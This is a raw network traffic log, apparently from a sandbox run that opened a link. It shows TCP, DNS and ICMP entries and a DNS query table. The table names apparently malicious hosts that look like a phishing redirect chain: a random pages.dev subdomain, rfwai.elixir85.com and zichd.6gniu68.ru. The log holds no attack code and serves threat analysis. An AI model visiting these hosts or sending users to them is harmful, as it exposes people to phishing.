                                                        Jul 3, 2024 21:07:28.872909069 CEST49829443192.168.2.5104.21.89.143
                                                        Jul 3, 2024 21:07:28.872922897 CEST44349829104.21.89.143192.168.2.5
                                                        Jul 3, 2024 21:07:28.873528957 CEST44349829104.21.89.143192.168.2.5
                                                        Jul 3, 2024 21:07:28.873569965 CEST44349829104.21.89.143192.168.2.5
                                                        Jul 3, 2024 21:07:28.873636961 CEST49829443192.168.2.5104.21.89.143
                                                        Jul 3, 2024 21:07:28.873652935 CEST44349829104.21.89.143192.168.2.5
                                                        Jul 3, 2024 21:07:28.873670101 CEST44349829104.21.89.143192.168.2.5
                                                        Jul 3, 2024 21:07:28.873744965 CEST49829443192.168.2.5104.21.89.143
                                                        Jul 3, 2024 21:07:28.911933899 CEST49829443192.168.2.5104.21.89.143
                                                        Jul 3, 2024 21:07:28.911969900 CEST44349829104.21.89.143192.168.2.5
                                                        Jul 3, 2024 21:07:35.953730106 CEST49834443192.168.2.5142.250.185.196
                                                        Jul 3, 2024 21:07:35.953753948 CEST44349834142.250.185.196192.168.2.5
                                                        Jul 3, 2024 21:07:35.953922033 CEST49834443192.168.2.5142.250.185.196
                                                        Jul 3, 2024 21:07:35.954204082 CEST49834443192.168.2.5142.250.185.196
                                                        Jul 3, 2024 21:07:35.954212904 CEST44349834142.250.185.196192.168.2.5
                                                        Jul 3, 2024 21:07:36.619462013 CEST44349834142.250.185.196192.168.2.5
                                                        Jul 3, 2024 21:07:36.619868040 CEST49834443192.168.2.5142.250.185.196
                                                        Jul 3, 2024 21:07:36.619884014 CEST44349834142.250.185.196192.168.2.5
                                                        Jul 3, 2024 21:07:36.620337009 CEST44349834142.250.185.196192.168.2.5
                                                        Jul 3, 2024 21:07:36.620656967 CEST49834443192.168.2.5142.250.185.196
                                                        Jul 3, 2024 21:07:36.620740891 CEST44349834142.250.185.196192.168.2.5
                                                        Jul 3, 2024 21:07:36.671139956 CEST49834443192.168.2.5142.250.185.196
                                                        Jul 3, 2024 21:07:37.345736027 CEST49835443192.168.2.5104.21.89.143
                                                        Jul 3, 2024 21:07:37.345776081 CEST44349835104.21.89.143192.168.2.5
                                                        Jul 3, 2024 21:07:37.345850945 CEST49835443192.168.2.5104.21.89.143
                                                        Jul 3, 2024 21:07:37.347407103 CEST49835443192.168.2.5104.21.89.143
                                                        Jul 3, 2024 21:07:37.347419977 CEST44349835104.21.89.143192.168.2.5
                                                        Jul 3, 2024 21:07:37.823422909 CEST44349835104.21.89.143192.168.2.5
                                                        Jul 3, 2024 21:07:37.823698044 CEST49835443192.168.2.5104.21.89.143
                                                        Jul 3, 2024 21:07:37.823712111 CEST44349835104.21.89.143192.168.2.5
                                                        Jul 3, 2024 21:07:37.824035883 CEST44349835104.21.89.143192.168.2.5
                                                        Jul 3, 2024 21:07:37.824426889 CEST49835443192.168.2.5104.21.89.143
                                                        Jul 3, 2024 21:07:37.824495077 CEST44349835104.21.89.143192.168.2.5
                                                        Jul 3, 2024 21:07:37.873532057 CEST49835443192.168.2.5104.21.89.143
                                                        Jul 3, 2024 21:07:43.467351913 CEST49837443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:43.467397928 CEST4434983740.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:43.467641115 CEST49837443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:43.470161915 CEST49837443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:43.470177889 CEST4434983740.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:43.489377975 CEST49838443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:43.489389896 CEST4434983840.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:43.489531040 CEST49838443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:43.490916014 CEST49838443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:43.490926981 CEST4434983840.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:44.385941982 CEST4434983840.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:44.386027098 CEST49838443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:44.390522003 CEST4434983740.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:44.390593052 CEST49837443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:44.501132011 CEST49838443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:44.501152992 CEST4434983840.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:44.501329899 CEST49837443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:44.501338959 CEST4434983740.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:44.501396894 CEST4434983840.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:44.501728058 CEST4434983740.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:44.504144907 CEST49837443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:44.504431963 CEST49837443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:44.504436970 CEST4434983740.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:44.504537106 CEST49837443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:44.525597095 CEST49838443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:44.528961897 CEST49838443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:44.528966904 CEST4434983840.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:44.529134035 CEST49838443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:44.552494049 CEST4434983740.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:44.576495886 CEST4434983840.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:44.689254999 CEST4434983740.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:44.689666033 CEST4434983740.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:44.689776897 CEST49837443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:44.689944983 CEST49837443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:44.689956903 CEST4434983740.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:44.715373039 CEST4434983840.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:44.716705084 CEST49838443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:44.716711998 CEST4434983840.115.3.253192.168.2.5
                                                        Jul 3, 2024 21:07:44.716775894 CEST49838443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:44.716795921 CEST49838443192.168.2.540.115.3.253
                                                        Jul 3, 2024 21:07:46.522627115 CEST44349834142.250.185.196192.168.2.5
                                                        Jul 3, 2024 21:07:46.522694111 CEST44349834142.250.185.196192.168.2.5
                                                        Jul 3, 2024 21:07:46.522768021 CEST49834443192.168.2.5142.250.185.196
                                                        Jul 3, 2024 21:07:47.723288059 CEST49834443192.168.2.5142.250.185.196
                                                        Jul 3, 2024 21:07:47.723315001 CEST44349834142.250.185.196192.168.2.5
                                                        Jul 3, 2024 21:07:48.902250051 CEST49839443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:48.902273893 CEST4434983935.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:48.902327061 CEST49839443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:48.902475119 CEST49840443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:48.902508974 CEST4434984035.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:48.902736902 CEST49839443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:48.902750969 CEST4434983935.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:48.902765036 CEST49840443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:48.902894020 CEST49840443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:48.902906895 CEST4434984035.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.374547958 CEST4434984035.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.374854088 CEST49840443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.374876976 CEST4434984035.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.375781059 CEST4434984035.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.375844955 CEST49840443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.376276016 CEST49840443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.376337051 CEST4434984035.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.376425028 CEST49840443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.376430035 CEST4434984035.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.393301964 CEST4434983935.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.393503904 CEST49839443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.393533945 CEST4434983935.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.394406080 CEST4434983935.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.394469023 CEST49839443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.394828081 CEST49839443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.394882917 CEST4434983935.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.394963980 CEST49839443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.420305967 CEST49840443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.435920954 CEST49839443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.435931921 CEST4434983935.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.482822895 CEST49839443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.512958050 CEST4434984035.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.513021946 CEST4434984035.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.513139009 CEST49840443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.513339043 CEST49840443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.513354063 CEST4434984035.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.513972044 CEST49841443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.514022112 CEST4434984135.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.514162064 CEST49841443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.514503956 CEST49841443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.514518976 CEST4434984135.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.534626007 CEST4434983935.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.534874916 CEST49839443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.534915924 CEST4434983935.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.534970045 CEST49839443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.535398960 CEST49842443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.535413980 CEST4434984235.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:49.535530090 CEST49842443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.535747051 CEST49842443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:49.535758972 CEST4434984235.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:50.000344992 CEST4434984135.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:50.000624895 CEST49841443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:50.000649929 CEST4434984135.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:50.001563072 CEST4434984135.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:50.001620054 CEST49841443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:50.001966000 CEST49841443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:50.002022982 CEST4434984135.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:50.002115965 CEST49841443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:50.002125025 CEST4434984135.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:50.026802063 CEST4434984235.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:50.026995897 CEST49842443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:50.027009964 CEST4434984235.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:50.027297020 CEST4434984235.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:50.027591944 CEST49842443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:50.027647972 CEST4434984235.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:50.027735949 CEST49842443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:50.045295954 CEST49841443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:50.072498083 CEST4434984235.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:50.137048960 CEST4434984135.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:50.137144089 CEST4434984135.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:50.137259007 CEST49841443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:50.137356043 CEST49841443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:50.137377024 CEST4434984135.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:50.137389898 CEST49841443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:50.137453079 CEST49841443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:50.161928892 CEST4434984235.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:50.162250042 CEST4434984235.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:50.163445950 CEST49842443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:50.164969921 CEST49842443192.168.2.535.190.80.1
                                                        Jul 3, 2024 21:07:50.164983988 CEST4434984235.190.80.1192.168.2.5
                                                        Jul 3, 2024 21:07:52.724637985 CEST44349835104.21.89.143192.168.2.5
                                                        Jul 3, 2024 21:07:52.724720001 CEST44349835104.21.89.143192.168.2.5
                                                        Jul 3, 2024 21:07:52.724761009 CEST49835443192.168.2.5104.21.89.143
                                                        Jul 3, 2024 21:07:53.721596003 CEST49835443192.168.2.5104.21.89.143
                                                        Jul 3, 2024 21:07:53.721622944 CEST44349835104.21.89.143192.168.2.5
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jul 3, 2024 21:06:35.759347916 CEST53517871.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:35.760270119 CEST53594101.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:35.891189098 CEST5449453192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:35.891331911 CEST5252453192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:35.901743889 CEST53544941.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:35.903613091 CEST53525241.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:36.812859058 CEST53622561.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:37.288273096 CEST5182753192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:37.288845062 CEST5501253192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:37.297909975 CEST53518271.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:37.299806118 CEST53550121.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:38.099198103 CEST5491953192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:38.099544048 CEST6360053192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:38.117057085 CEST53636001.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:38.121570110 CEST53549191.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:39.878631115 CEST6268753192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:39.878632069 CEST5383853192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:39.896703005 CEST53626871.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:39.897300959 CEST53538381.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:40.952240944 CEST6325453192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:40.953744888 CEST6269353192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:40.963645935 CEST53632541.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:40.973855019 CEST53626931.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:48.763643026 CEST5006453192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:48.763957977 CEST6517553192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:48.776010990 CEST53500641.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:48.818064928 CEST53651751.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:48.882755995 CEST5566853192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:48.883122921 CEST5842853192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:48.889877081 CEST53556681.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:48.890907049 CEST53584281.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:49.854305029 CEST5474653192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:49.854924917 CEST5426253192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:49.856318951 CEST4987553192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:49.856745958 CEST5719153192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:49.858443975 CEST5684653192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:49.858813047 CEST5435253192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:49.861932039 CEST53547461.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:49.861948967 CEST53542621.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:49.863852024 CEST53498751.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:49.864905119 CEST53571911.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:49.865505934 CEST53543521.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:49.865849972 CEST53568461.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:49.878392935 CEST5440853192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:49.878582001 CEST6083653192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:49.892201900 CEST53608361.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:50.013181925 CEST53544081.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:51.431736946 CEST6328753192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:51.432255983 CEST4966753192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:51.439456940 CEST53632871.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:51.442002058 CEST53496671.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:52.959522963 CEST5392453192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:52.959754944 CEST5001253192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:06:52.966876984 CEST53539241.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:52.969553947 CEST53500121.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:06:53.933362007 CEST53618941.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:12.726053953 CEST53588551.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:15.915874004 CEST6191553192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:15.916273117 CEST5994353192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:15.932446003 CEST53599431.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:15.960339069 CEST53619151.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:19.821225882 CEST5850953192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:19.821944952 CEST5554653192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:19.822221041 CEST5439453192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:19.822566032 CEST5051953192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:19.823036909 CEST6157353192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:19.823349953 CEST5681953192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:19.829631090 CEST53543941.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:19.830678940 CEST53568191.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:19.831027031 CEST53555461.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:19.831792116 CEST53585091.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:19.833125114 CEST53505191.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:19.834733963 CEST53615731.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:19.834975004 CEST5830153192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:19.835370064 CEST6172253192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:19.846872091 CEST53583011.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:19.847857952 CEST53617221.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:21.043104887 CEST5959053192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:21.043479919 CEST6432153192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:21.051652908 CEST53595901.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:21.053927898 CEST53643211.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:21.757611990 CEST53568061.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:22.703490973 CEST5082853192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:22.703933954 CEST5317653192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:22.713237047 CEST53508281.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:22.716528893 CEST53531761.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:23.402152061 CEST53556121.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:24.826817989 CEST5073553192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:24.828660965 CEST6058853192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:24.837363958 CEST53507351.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:24.839348078 CEST53605881.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:26.185770988 CEST5319153192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:26.185771942 CEST6097953192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:26.188792944 CEST5559853192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:26.189038038 CEST5005653192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:26.192797899 CEST53531911.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:26.196209908 CEST53609791.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:26.196549892 CEST53500561.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:26.196645021 CEST53555981.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:27.024822950 CEST6486353192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:27.025007963 CEST5294153192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:27.025450945 CEST6293953192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:27.025664091 CEST4940753192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:27.033121109 CEST53629391.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:27.035089970 CEST53494071.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:27.057703018 CEST53529411.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:27.075392008 CEST53648631.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:27.994126081 CEST5001653192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:27.994292974 CEST5428253192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:28.013878107 CEST53500161.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:28.013891935 CEST53542821.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:34.871068001 CEST53639891.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:35.383001089 CEST53588301.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:48.890554905 CEST5257253192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:48.890791893 CEST5046153192.168.2.51.1.1.1
                                                        Jul 3, 2024 21:07:48.899106026 CEST53525721.1.1.1192.168.2.5
                                                        Jul 3, 2024 21:07:48.901803017 CEST53504611.1.1.1192.168.2.5
                                                        TimestampSource IPDest IPChecksumCodeType
                                                        Jul 3, 2024 21:06:40.973936081 CEST192.168.2.51.1.1.1c24f(Port unreachable)Destination Unreachable
                                                        Jul 3, 2024 21:06:48.818131924 CEST192.168.2.51.1.1.1c230(Port unreachable)Destination Unreachable
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jul 3, 2024 21:06:35.891189098 CEST192.168.2.51.1.1.10x3346Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:35.891331911 CEST192.168.2.51.1.1.10xd7fStandard query (0)www.google.com65IN (0x0001)false
                                                        Jul 3, 2024 21:06:37.288273096 CEST192.168.2.51.1.1.10x413Standard query (0)link.mail.beehiiv.comA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:37.288845062 CEST192.168.2.51.1.1.10x1334Standard query (0)link.mail.beehiiv.com65IN (0x0001)false
                                                        Jul 3, 2024 21:06:38.099198103 CEST192.168.2.51.1.1.10x1b80Standard query (0)ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.devA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:38.099544048 CEST192.168.2.51.1.1.10xa421Standard query (0)ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev65IN (0x0001)false
                                                        Jul 3, 2024 21:06:39.878631115 CEST192.168.2.51.1.1.10x6a7cStandard query (0)rfwai.elixir85.comA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:39.878632069 CEST192.168.2.51.1.1.10xe116Standard query (0)rfwai.elixir85.com65IN (0x0001)false
                                                        Jul 3, 2024 21:06:40.952240944 CEST192.168.2.51.1.1.10x8ad2Standard query (0)ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.devA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:40.953744888 CEST192.168.2.51.1.1.10x226fStandard query (0)ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev65IN (0x0001)false
                                                        Jul 3, 2024 21:06:48.763643026 CEST192.168.2.51.1.1.10xb699Standard query (0)zichd.6gniu68.ruA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:48.763957977 CEST192.168.2.51.1.1.10xf6Standard query (0)zichd.6gniu68.ru65IN (0x0001)false
                                                        Jul 3, 2024 21:06:48.882755995 CEST192.168.2.51.1.1.10xe92Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:48.883122921 CEST192.168.2.51.1.1.10xc663Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.854305029 CEST192.168.2.51.1.1.10x172cStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.854924917 CEST192.168.2.51.1.1.10x2f2bStandard query (0)code.jquery.com65IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.856318951 CEST192.168.2.51.1.1.10x4ab8Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.856745958 CEST192.168.2.51.1.1.10x62c4Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.858443975 CEST192.168.2.51.1.1.10xd028Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.858813047 CEST192.168.2.51.1.1.10x4666Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.878392935 CEST192.168.2.51.1.1.10xd5edStandard query (0)zichd.6gniu68.ruA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.878582001 CEST192.168.2.51.1.1.10x1520Standard query (0)zichd.6gniu68.ru65IN (0x0001)false
                                                        Jul 3, 2024 21:06:51.431736946 CEST192.168.2.51.1.1.10xb5b2Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:51.432255983 CEST192.168.2.51.1.1.10xc985Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Jul 3, 2024 21:06:52.959522963 CEST192.168.2.51.1.1.10x550eStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:52.959754944 CEST192.168.2.51.1.1.10x47b3Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Jul 3, 2024 21:07:15.915874004 CEST192.168.2.51.1.1.10x7ff2Standard query (0)rfwai.elixir85.comA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:15.916273117 CEST192.168.2.51.1.1.10x3f9eStandard query (0)rfwai.elixir85.com65IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.821225882 CEST192.168.2.51.1.1.10x2800Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
